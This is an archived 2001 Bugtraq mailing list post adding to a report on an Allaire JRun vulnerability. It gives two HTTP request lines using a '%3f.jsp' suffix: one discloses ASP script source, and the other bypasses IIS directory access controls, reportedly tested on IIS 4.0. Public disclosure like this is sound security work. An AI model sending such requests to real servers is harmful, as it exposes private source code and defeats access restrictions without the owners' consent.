[23382] in bugtraq

home help back first fref pref prev next nref lref last post

Allaire JRun ACL bypassing/soure disclosure vulnerability

daemon@ATHENA.MIT.EDU (Gregory Duchemin)
Mon Dec 3 18:08:42 2001

Date: 3 Dec 2001 07:54:26 -0000
Message-ID: <20011203075426.8875.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Gregory Duchemin <c3rb3r@hotmail.com>
To: bugtraq@securityfocus.com


In-Reply-To: <009a01c1792a$d8a23160$0205a8c0@athlon>

hi,

just an add on for the Jrun indexing vulnerability, the 
same %3f.jsp trick allows to view server scripts 
sources by using :
GET /scripts.asp%3f.jsp HTTP/1.0

and can be used to bypass IIS directories ACLs too 
while indexing the content and/or viewing files.
GET /ACL-protected/%3f.jsp

tested on IIs 4.0

Have a nice day
Gregory



home help back first fref pref prev next nref lref last post